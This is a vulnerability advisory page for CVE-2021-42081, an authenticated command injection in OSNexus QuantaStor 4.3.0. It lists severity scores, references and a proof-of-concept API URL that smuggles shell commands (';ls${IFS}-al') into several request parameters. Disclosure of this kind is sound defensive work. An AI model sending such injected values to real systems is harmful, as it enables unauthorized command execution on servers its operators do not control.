Vulnerability Details CVE-2021-42081
An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API.
POC
http://<IP_ADDRESS>/qstorapi/storageSystemModify?storageSystem=&newName=quantastor&newDescription=;ls${IFS}-al&newLocation=4&newEnclosureLayoutId=5&newDnsServerList=;ls${IFS}-al&externalHostName=&newNTPServerList=;ls${IFS}-al
Exploit prediction scoring system (EPSS) score
EPSS Score 0.001
EPSS Ranking 25.4%
CVSS Severity
CVSS v3 Score 9.1
References
- https://csirt.divd.nl/CVE-2021-42081
- https://csirt.divd.nl/DIVD-2021-00020/
- https://www.osnexus.com/products/software-defined-storage
- https://www.wbsec.nl/osnexus
- https://csirt.divd.nl/CVE-2021-42081
- https://www.divd.nl/DIVD-2021-00020
- https://www.osnexus.com/products/software-defined-storage
- https://www.wbsec.nl/osnexus
Products affected by CVE-2021-42081
-
cpe:2.3:a:osnexus:quantastor:4.3.0